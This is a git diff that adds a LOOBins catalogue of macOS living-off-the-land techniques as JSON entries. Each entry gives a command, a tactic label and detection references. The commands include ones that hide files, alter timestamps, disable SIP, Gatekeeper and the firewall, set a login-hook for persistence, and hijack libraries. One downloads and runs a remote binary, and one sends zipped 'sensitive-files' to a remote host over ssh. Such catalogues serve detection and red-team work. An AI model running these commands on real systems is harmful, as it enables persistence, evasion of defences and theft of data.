"WADComs": 60 + "WADComs": 60, + "DAEMON": 83, + "LOOBins": 62 } }, "commits": { "gtfobins": "acd5246", "lolbas": "7aca936", - "wadcoms": "a864cd1" + "wadcoms": "a864cd1", + "loobins": "399e3c4bdddb55c7dc49beb20bfe43490eac1184" } } diff --git a/src/data/index-hash.json b/src/data/index-hash.json @@ -1,6 +1,6 @@ { - "file": "index-6f58d793.json", - "hash": "6f58d793", - "bytes": 1310869, - "count": 2885 + "file": "index-62f034da.json", + "hash": "62f034da", + "bytes": 2877328, + "count": 3085 } diff --git a/src/data/sources/loobins.json b/src/data/sources/loobins.json @@ -0,0 +1,7873 @@ +{ + "repository": "https://github.com/infosecB/LOOBins", + "commit": "399e3c4bdddb55c7dc49beb20bfe43490eac1184", + "license": "GPL-3.0", + "techniques": [ + { + "id": "loobins:GetFileInfo:764efced340d4784", + "toolId": "loobins:GetFileInfo", + "toolName": "GetFileInfo", + "name": "Iterate through a directory to GetFileInfo", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "for FILE in ~/Downloads/*; do echo $(GetFileInfo $FILE) >> fileinfo.txt; sleep 2; done", + "description": "A bash or zsh oneliner can provide an attacker with information about specific files of interest.", + "mitre": [], + "fullPath": [ + "/usr/bin/GetFileInfo" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/GetFileInfo.yml", + "https://macosbin.com/bin/getfileinfo" + ] + }, + { + "id": "loobins:SetFile:16396f8014d822c7", + "toolId": "loobins:SetFile", + "toolName": "SetFile", + "name": "Set a file or directory attribute to invisible", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence", + "Defense Evasion" + ], + "nativeCategory": [ + "Persistence", + "Defense Evasion" + ], + "command": "for FILE in ~/*; do echo $(SetFile -a V $FILE && echo $(GetFileInfo $FILE)) >> /tmp/fileinfo.txt; sleep 2; done", + "description": "A bash or zsh oneliner can allow an attacker to set the file attribute to invisible. This action can establish persistence and evade detection for malicious files on the system.", + "mitre": [], + "fullPath": [ + "/usr/bin/SetFile" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml", + "https://daringfireball.net/2008/04/the_invisible_bit" + ] + }, + { + "id": "loobins:SetFile:60497c149294fffb", + "toolId": "loobins:SetFile", + "toolName": "SetFile", + "name": "Change a file's creation and modification timestamps", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "SetFile -d \"04/25/2023 11:11:00\" -m \"04/25/2023 11:12:00\" targetfile.txt", + "description": "Setfile can be used with the -d and -m arguments to alter a file's creation and modification date, respectively.", + "mitre": [], + "fullPath": [ + "/usr/bin/SetFile" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml", + "https://daringfireball.net/2008/04/the_invisible_bit" + ] + }, + { + "id": "loobins:caffeinate:eed3d0d746ebad74", + "toolId": "loobins:caffeinate", + "toolName": "caffeinate", + "name": "Fork a process", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion" + ], + "command": "caffeinate -i /tmp/evil", + "description": "Make caffeinate fork a process and hold an assertion that prevents idle sleep as long as that process is running", + "mitre": [], + "fullPath": [ + "/usr/bin/caffeinate" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml", + "https://macosbin.com/bin/caffeinate", + "https://ss64.com/osx/caffeinate.html" + ] + }, + { + "id": "loobins:caffeinate:b64b930cbcc85165", + "toolId": "loobins:caffeinate", + "toolName": "caffeinate", + "name": "Prevent a sleep", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "caffeinate -u -t 14400", + "description": "Prevent a macOS from going to sleep for 4 hours (14400 seconds)", + "mitre": [], + "fullPath": [ + "/usr/bin/caffeinate" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml", + "https://macosbin.com/bin/caffeinate", + "https://ss64.com/osx/caffeinate.html" + ] + }, + { + "id": "loobins:chflags:6dc222e2477a144c", + "toolId": "loobins:chflags", + "toolName": "chflags", + "name": "Hide a file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "chflags hidden ~/evil", + "description": "Add the hidden flag to a file or directory to prevent it from being \nvisible in Finder and Terminal.", + "mitre": [], + "fullPath": [ + "/usr/bin/chflags" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Hidden Flag Set On File/Directory Via Chflags", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml", + "https://ss64.com/mac/chflags.html", + "https://macosbin.com/bin/chflags", + "https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/" + ] + }, + { + "id": "loobins:chflags:657af3584bd20804", + "toolId": "loobins:chflags", + "toolName": "chflags", + "name": "Remove hidden flag", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "chflags nohidden ~/evil", + "description": "Remove the hidden flag to a file or directory to make it visible in Finder\nand Terminal.", + "mitre": [], + "fullPath": [ + "/usr/bin/chflags" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Hidden Flag Set On File/Directory Via Chflags", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml", + "https://ss64.com/mac/chflags.html", + "https://macosbin.com/bin/chflags", + "https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/" + ] + }, + { + "id": "loobins:codesign:7e467a3d8b50ed97", + "toolId": "loobins:codesign", + "toolName": "codesign", + "name": "Ad-hoc codesigning an app bundle", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "codesign --force --deep -s - MyApp.app", + "description": "This command forcefully re-signs the MyApp.app application with an ad-hoc signature, applying the signature deeply to all nested code within the app", + "mitre": [], + "fullPath": [ + "/usr/bin/codesign" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect ad-hoc codesigning activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/adhoc_codesigning.yaml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/codesign.yml", + "https://www.sentinelone.com/blog/when-apple-admits-macos-malware-is-a-problem-its-time-to-take-notice/", + "https://ss64.com/mac/codesign.html" + ] + }, + { + "id": "loobins:csrutil:26103c8c140bf3a9", + "toolId": "loobins:csrutil", + "toolName": "csrutil", + "name": "Disable SIP", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "csrutil disable", + "description": "disable SIP (System Integrity Protection) - requires booting into recovery mode", + "mitre": [], + "fullPath": [ + "/usr/bin/csrutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: System Integrity Protection (SIP) Disabled", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" + }, + { + "type": "Sigma: System Integrity Protection (SIP) Enumeration", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", + "https://developer.apple.com/forums/thread/4002", + "https://attack.mitre.org/techniques/T1518/001/", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" + ] + }, + { + "id": "loobins:csrutil:a0a1b78e4d71e620", + "toolId": "loobins:csrutil", + "toolName": "csrutil", + "name": "Disable authenticated-root", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "csrutil authenticated-root disable", + "description": "When authenticated-root is disabled, booting is allowed from non-sealed system snapshots - requires booting into recovery mode", + "mitre": [], + "fullPath": [ + "/usr/bin/csrutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: System Integrity Protection (SIP) Disabled", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" + }, + { + "type": "Sigma: System Integrity Protection (SIP) Enumeration", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", + "https://developer.apple.com/forums/thread/4002", + "https://attack.mitre.org/techniques/T1518/001/", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" + ] + }, + { + "id": "loobins:csrutil:bc2665f645a68439", + "toolId": "loobins:csrutil", + "toolName": "csrutil", + "name": "Add a netboot server", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "csrutil netboot add <address>", + "description": "Insert a new IPv4 address in the list of allowed NetBoot sources", + "mitre": [], + "fullPath": [ + "/usr/bin/csrutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: System Integrity Protection (SIP) Disabled", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" + }, + { + "type": "Sigma: System Integrity Protection (SIP) Enumeration", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", + "https://developer.apple.com/forums/thread/4002", + "https://attack.mitre.org/techniques/T1518/001/", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" + ] + }, + { + "id": "loobins:csrutil:3e74e76040ed06ba", + "toolId": "loobins:csrutil", + "toolName": "csrutil", + "name": "Map infrastructure", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Reconnaissance", + "Discovery" + ], + "command": "csrutil netboot list", + "description": "List allowed NetBoot sources", + "mitre": [], + "fullPath": [ + "/usr/bin/csrutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: System Integrity Protection (SIP) Disabled", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" + }, + { + "type": "Sigma: System Integrity Protection (SIP) Enumeration", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", + "https://developer.apple.com/forums/thread/4002", + "https://attack.mitre.org/techniques/T1518/001/", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" + ] + }, + { + "id": "loobins:csrutil:33a98a8b396dd6ec", + "toolId": "loobins:csrutil", + "toolName": "csrutil", + "name": "Determine if SIP is enabled", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "csrutil status", + "description": "Determine if System Integrity Protection is enabled", + "mitre": [], + "fullPath": [ + "/usr/bin/csrutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: System Integrity Protection (SIP) Disabled", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" + }, + { + "type": "Sigma: System Integrity Protection (SIP) Enumeration", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", + "https://developer.apple.com/forums/thread/4002", + "https://attack.mitre.org/techniques/T1518/001/", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" + ] + }, + { + "id": "loobins:defaults:2be370c95286961d", + "toolId": "loobins:defaults", + "toolName": "defaults", + "name": "Disable Gatekeeper's auto rearm functionality", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "sudo defaults write /Library/Preferences/com.apple.security GKAutoRearm -bool NO", + "description": "The following command can be used to disable Gatekeepers rearm functionality. This command requires root privileges.", + "mitre": [], + "fullPath": [ + "/usr/bin/defaults" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", + "https://macos-defaults.com/", + "https://www.huntress.com/blog/insistence-on-persistence" + ] + }, + { + "id": "loobins:defaults:8f051a66b5fb0607", + "toolId": "loobins:defaults", + "toolName": "defaults", + "name": "Show mounted servers", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "defaults read com.apple.finder \"ShowMountedServersOnDesktop\"", + "description": "Show all mounted servers on the desktop.", + "mitre": [], + "fullPath": [ + "/usr/bin/defaults" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", + "https://macos-defaults.com/", + "https://www.huntress.com/blog/insistence-on-persistence" + ] + }, + { + "id": "loobins:defaults:4052ddb76eee1951", + "toolId": "loobins:defaults", + "toolName": "defaults", + "name": "Add a login item to the current user", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "sudo defaults write /Library/Preferences/com.apple.loginwindow LoginHook gain_persistence.sh", + "description": "An attacker can use defaults to add a login hook in attempt to gain persistence. This command requires root privileges.", + "mitre": [], + "fullPath": [ + "/usr/bin/defaults" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", + "https://macos-defaults.com/", + "https://www.huntress.com/blog/insistence-on-persistence" + ] + }, + { + "id": "loobins:defaults:16d24c230e14950e", + "toolId": "loobins:defaults", + "toolName": "defaults", + "name": "Get Active Directory user info from Jamf Connect", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "defaults read com.jamf.connect.state", + "description": "Retrieve Active Directory user info from Jamf Connect defaults configuration.", + "mitre": [], + "fullPath": [ + "/usr/bin/defaults" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", + "https://macos-defaults.com/", + "https://www.huntress.com/blog/insistence-on-persistence" + ] + }, + { + "id": "loobins:defaults:1600168e079bee30", + "toolId": "loobins:defaults", + "toolName": "defaults", + "name": "Enable Firewall", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 1", + "description": "Enables macOS' default firewall. This command requires root privileges.", + "mitre": [], + "fullPath": [ + "/usr/bin/defaults" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", + "https://macos-defaults.com/", + "https://www.huntress.com/blog/insistence-on-persistence" + ] + }, + { + "id": "loobins:defaults:72f81c54c9acbf93", + "toolId": "loobins:defaults", + "toolName": "defaults", + "name": "Disable Firewall", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0", + "description": "Disables macOS' default firewall. This command requires root privileges.", + "mitre": [], + "fullPath": [ + "/usr/bin/defaults" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", + "https://macos-defaults.com/", + "https://www.huntress.com/blog/insistence-on-persistence" + ] + }, + { + "id": "loobins:disown:e2c68d9f80308eca", + "toolId": "loobins:disown", + "toolName": "disown", + "name": "Start a process and remove it from the jobs table.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "curl -O http://1.1.1.1/updated && chmod +x updated && ./updated & disown && pkill Terminal", + "description": "The following command downloads a remote binary, sets it to executable, executes the binary, disowns it from the shell it spawned from, and closes the terminal session.", + "mitre": [], + "fullPath": [ + "shell built-in command (bash)" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content at time of writing", + "value": "No detection content at time of writing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/disown.yml", + "https://linux.die.net/man/1/disown", + "https://man7.org/linux/man-pages/man1/bash.1.html", + "https://www.esentire.com/blog/poseidon-stealer-uses-sora-ai-lure-to-infect-macos" + ] + }, + { + "id": "loobins:ditto:a669d3fe27d2b814", + "toolId": "loobins:ditto", + "toolName": "ditto", + "name": "Copy and compress sensitive data locally", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection", + "Exfiltration" + ], + "command": "ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip", + "description": "The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.", + "mitre": [], + "fullPath": [ + "/usr/bin/ditto" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content at time of writing", + "value": "No detection content at time of writing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", + "https://ss64.com/osx/ditto.html", + "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", + "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" + ] + }, + { + "id": "loobins:ditto:3956e8036c3f0ecc", + "toolId": "loobins:ditto", + "toolName": "ditto", + "name": "Remove extended attributes from a file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection", + "Exfiltration" + ], + "command": "ditto -c -k unsigned.app app.zip ditto -x -k app.zip unsigned.app 2>/dev/null", + "description": "ditto can be used to bypass Gatekeeper by removing the \"com.apple.quarantine\" extended attribute.", + "mitre": [], + "fullPath": [ + "/usr/bin/ditto" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content at time of writing", + "value": "No detection content at time of writing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", + "https://ss64.com/osx/ditto.html", + "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", + "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" + ] + }, + { + "id": "loobins:ditto:cdd3c14f73ed66d6", + "toolId": "loobins:ditto", + "toolName": "ditto", + "name": "Copy, compress, and transfer sensitive data to a remote macOS host", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection", + "Lateral Movement", + "Defense Evasion" + ], + "nativeCategory": [ + "Collection", + "Exfiltration", + "Lateral Movement", + "Defense Evasion" + ], + "command": "ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t", + "description": "The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.", + "mitre": [], + "fullPath": [ + "/usr/bin/ditto" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content at time of writing", + "value": "No detection content at time of writing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", + "https://ss64.com/osx/ditto.html", + "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", + "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" + ] + }, + { + "id": "loobins:ditto:46f00f81c5001006", + "toolId": "loobins:ditto", + "toolName": "ditto", + "name": "DLL hijacking", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib", + "description": "Replace a legitimate library with a malicious one while maintaining the original file permissions and attributes.", + "mitre": [], + "fullPath": [ + "/usr/bin/ditto" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content at time of writing", + "value": "No detection content at time of writing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", + "https://ss64.com/osx/ditto.html", + "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", + "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" + ] + }, + { + "id": "loobins:dns-sd:53f3998acc18fff6", + "toolId": "loobins:dns-sd", + "toolName": "dns-sd", + "name": "Discover SSH hosts", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dns-sd -B _ssh._tcp", + "description": "Hosts serving SSH can be discovered using the _ssh._tcp service string.", + "mitre": [], + "fullPath": [ + "/usr/bin/dns-sd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect dns-sd discovery activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", + "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", + "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" + ] + }, + { + "id": "loobins:dns-sd:53dfc1310c71878f", + "toolId": "loobins:dns-sd", + "toolName": "dns-sd", + "name": "Discover web hosts", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dns-sd -B _http._tcp", + "description": "Hosts serving web services can be discovered using the _http._tcp service string.", + "mitre": [], + "fullPath": [ + "/usr/bin/dns-sd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect dns-sd discovery activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", + 